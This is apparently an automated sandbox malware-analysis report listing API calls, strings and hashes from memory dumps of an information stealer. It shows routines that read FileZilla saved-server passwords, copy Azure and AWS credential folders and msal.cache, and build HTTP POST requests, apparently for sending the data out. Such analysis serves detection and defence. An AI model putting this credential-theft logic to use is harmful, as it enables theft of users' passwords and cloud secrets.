                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: free
                    • String ID:
                    • API String ID: 1294909896-0
                    • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                    • Instruction ID: a0af666c7ba9f6ee54153b0f7328413c8dbc2d987e7bea5e274101a809a74797
                    • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                    • Instruction Fuzzy Hash: 1771C131551A40DBF7623B31DD01ECA7AA27F0870EF104924A1DB39670DEB278659ED9
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                    • strtok_s.MSVCRT ref: 0041031B
                    • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                    • lstrlenA.KERNEL32(00000000), ref: 00410393
                      • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                      • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                    • lstrlenA.KERNEL32(00000000), ref: 004103DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                    • lstrlenA.KERNEL32(00000000), ref: 00410427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                    • lstrlenA.KERNEL32(00000000), ref: 00410475
                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                    • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                    • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                    • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                    • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                    • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                    • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                    • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                    • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                    • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                    • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                    • strtok_s.MSVCRT ref: 00410679
                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                    • memset.MSVCRT ref: 004106DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 337689325-514892060
                    • Opcode ID: 3bc2c577a6fe1a4c48c4c66cd480b769372ba09bd9cd762d3494ee533b5cfef0
                    • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                    • Opcode Fuzzy Hash: 3bc2c577a6fe1a4c48c4c66cd480b769372ba09bd9cd762d3494ee533b5cfef0
                    • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                    APIs
                    • lstrlen.KERNEL32(00424D98), ref: 040A4833
                    • lstrlen.KERNEL32(00424E48), ref: 040A483E
                    • lstrlen.KERNEL32(00424F10), ref: 040A4849
                    • lstrlen.KERNEL32(00424FC8), ref: 040A4854
                    • lstrlen.KERNEL32(00425070), ref: 040A485F
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 040A486E
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040A4875
                    • lstrlen.KERNEL32(00425118), ref: 040A4883
                    • lstrlen.KERNEL32(004251C0), ref: 040A488E
                    • lstrlen.KERNEL32(00425268), ref: 040A4899
                    • lstrlen.KERNEL32(00425310), ref: 040A48A4
                    • lstrlen.KERNEL32(004253B8), ref: 040A48AF
                    • lstrlen.KERNEL32(00425460), ref: 040A48C3
                    • lstrlen.KERNEL32(00425508), ref: 040A48CE
                    • lstrlen.KERNEL32(004255B0), ref: 040A48D9
                    • lstrlen.KERNEL32(00425658), ref: 040A48E4
                    • lstrlen.KERNEL32(00425700), ref: 040A48EF
                    • lstrlen.KERNEL32(004257A8), ref: 040A4918
                    • lstrlen.KERNEL32(00425850), ref: 040A4923
                    • lstrlen.KERNEL32(00425918), ref: 040A492E
                    • lstrlen.KERNEL32(004259C0), ref: 040A4939
                    • lstrlen.KERNEL32(00425A68), ref: 040A4944
                    • strlen.MSVCRT ref: 040A4957
                    • lstrlen.KERNEL32(00425B10), ref: 040A497F
                    • lstrlen.KERNEL32(00425BB8), ref: 040A498A
                    • lstrlen.KERNEL32(00425C60), ref: 040A4995
                    • lstrlen.KERNEL32(00425D08), ref: 040A49A0
                    • lstrlen.KERNEL32(00425DB0), ref: 040A49AB
                    • lstrlen.KERNEL32(00425E58), ref: 040A49BB
                    • lstrlen.KERNEL32(00425F00), ref: 040A49C6
                    • lstrlen.KERNEL32(00425FA8), ref: 040A49D1
                    • lstrlen.KERNEL32(00426050), ref: 040A49DC
                    • lstrlen.KERNEL32(004260F8), ref: 040A49E7
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 040A4A03
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                    • String ID:
                    • API String ID: 2127927946-0
                    • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                    • Instruction ID: 06640b4fed8a9159e7fdea7ac742daa2456a921f9b85c55ca80d715710cc3994
                    • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                    • Instruction Fuzzy Hash: 7341A979740624EBC718AFE5EC89B9C7F71AB4C712BA0C062F9029A190C7F5D5119B3E
                    APIs
                    • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 040B9B08
                    • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 040B9B21
                    • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 040B9B39
                    • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 040B9B51
                    • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 040B9B6A
                    • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 040B9B82
                    • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 040B9B9A
                    • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 040B9BB3
                    • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 040B9BCB
                    • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 040B9BE3
                    • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 040B9BFC
                    • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 040B9C14
                    • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 040B9C2C
                    • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 040B9C45
                    • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 040B9C5D
                    • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 040B9C75
                    • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 040B9C8E
                    • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 040B9CA6
                    • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 040B9CBE
                    • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 040B9CD7
                    • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 040B9CEF
                    • LoadLibraryA.KERNEL32(0064A550,?,040B6C67), ref: 040B9D01
                    • LoadLibraryA.KERNEL32(0064A17C,?,040B6C67), ref: 040B9D12
                    • LoadLibraryA.KERNEL32(0064A104,?,040B6C67), ref: 040B9D24
                    • LoadLibraryA.KERNEL32(0064A1DC,?,040B6C67), ref: 040B9D36
                    • LoadLibraryA.KERNEL32(0064A328,?,040B6C67), ref: 040B9D47
                    • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 040B9D69
                    • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 040B9D8A
                    • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 040B9DA2
                    • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 040B9DC4
                    • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 040B9DE5
                    • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 040B9E06
                    • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 040B9E1D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID:
                    • API String ID: 2238633743-0
                    • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                    • Instruction ID: 2b4f4bd6c742fb540b822c6df12fc111507254a72e416dad9698c5328f43ab40
                    • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                    • Instruction Fuzzy Hash: 66A13DBD5C0240BFE364EFE8ED889A63BFBF74E301714661AE605C3264D639A441DB52
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 040A9C53
                      • Part of subcall function 040A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 040A9C78
                      • Part of subcall function 040A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 040A9C98
                      • Part of subcall function 040A9C27: ReadFile.KERNEL32(000000FF,?,00000000,040A16F6,00000000), ref: 040A9CC1
                      • Part of subcall function 040A9C27: LocalFree.KERNEL32(040A16F6), ref: 040A9CF7
                      • Part of subcall function 040A9C27: CloseHandle.KERNEL32(000000FF), ref: 040A9D01
                      • Part of subcall function 040B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 040B90B9
                    • strtok_s.MSVCRT ref: 040B0582
                    • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 040B05C9
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040B05D0
                    • StrStrA.SHLWAPI(00000000,00421618), ref: 040B05EC
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B05FA
                      • Part of subcall function 040B8B47: malloc.MSVCRT ref: 040B8B4F
                      • Part of subcall function 040B8B47: strncpy.MSVCRT ref: 040B8B6A
                    • StrStrA.SHLWAPI(00000000,00421620), ref: 040B0636
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B0644
                    • StrStrA.SHLWAPI(00000000,00421628), ref: 040B0680
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B068E
                    • StrStrA.SHLWAPI(00000000,00421630), ref: 040B06CA
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B06DC
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B0769
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B0781
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B0799
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B07B1
                    • lstrcat.KERNEL32(?,0042164C), ref: 040B07C9
                    • lstrcat.KERNEL32(?,00421660), ref: 040B07D8
                    • lstrcat.KERNEL32(?,00421670), ref: 040B07E7
                    • lstrcat.KERNEL32(?,00000000), ref: 040B07FA
                    • lstrcat.KERNEL32(?,00421678), ref: 040B0809
                    • lstrcat.KERNEL32(?,00000000), ref: 040B081C
                    • lstrcat.KERNEL32(?,0042167C), ref: 040B082B
                    • lstrcat.KERNEL32(?,00421680), ref: 040B083A
                    • lstrcat.KERNEL32(?,00000000), ref: 040B084D
                    • lstrcat.KERNEL32(?,00421688), ref: 040B085C
                    • lstrcat.KERNEL32(?,0042168C), ref: 040B086B
                    • lstrcat.KERNEL32(?,00000000), ref: 040B087E
                    • lstrcat.KERNEL32(?,00421698), ref: 040B088D
                    • lstrcat.KERNEL32(?,0042169C), ref: 040B089C
                    • strtok_s.MSVCRT ref: 040B08E0
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B08F5
                    • memset.MSVCRT ref: 040B0944
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                    • String ID:
                    • API String ID: 3689735781-0
                    • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                    • Instruction ID: 4419b06d3f06bc5314e35d6d8ae95c27eeba36505f13c2558984a5383eb6ae0d
                    • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                    • Instruction Fuzzy Hash: 0CD15C75A40208ABDB04FBF4DD85EEEB779AF14308F544518E142B6094DF78BA05CFA9
                    APIs
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                    • StrCmpCA.SHLWAPI(?,024E9120), ref: 00405A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,024ED4A0,00000000,?,024B9858,00000000,?,00421A1C), ref: 00405E71
                    • lstrlenA.KERNEL32(00000000), ref: 00405E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                    • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                    • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                    • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                    • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                    • memcpy.MSVCRT(?), ref: 00405EFE
                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                    • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                    • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                    • HttpOpenRequestA.WININET(00000000,024ED4D0,?,024ECDB8,00000000,00000000,00400100,00000000), ref: 00405BF8
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                    • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 1406981993-2180234286
                    • Opcode ID: 666bbb9bba4a1dc80c75d8d39e09cf3d748a28728b0d32cd90eb582302fc047f
                    • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                    • Opcode Fuzzy Hash: 666bbb9bba4a1dc80c75d8d39e09cf3d748a28728b0d32cd90eb582302fc047f
                    • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                    APIs
                    • memset.MSVCRT ref: 00414D87
                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                    • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                    • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                    • memset.MSVCRT ref: 00414E13
                    • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                    • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                    • memset.MSVCRT ref: 00414E9F
                    • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                    • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                      • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,024E90F0,?,000003E8), ref: 00414A4A
                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                      • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                      • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                    • memset.MSVCRT ref: 00414F2B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                    • API String ID: 4017274736-156832076
                    • Opcode ID: 9c612fc516eee28b221766771ad860b5795089092fef9f7b581a933fd2b7ea00
                    • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                    • Opcode Fuzzy Hash: 9c612fc516eee28b221766771ad860b5795089092fef9f7b581a933fd2b7ea00
                    • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
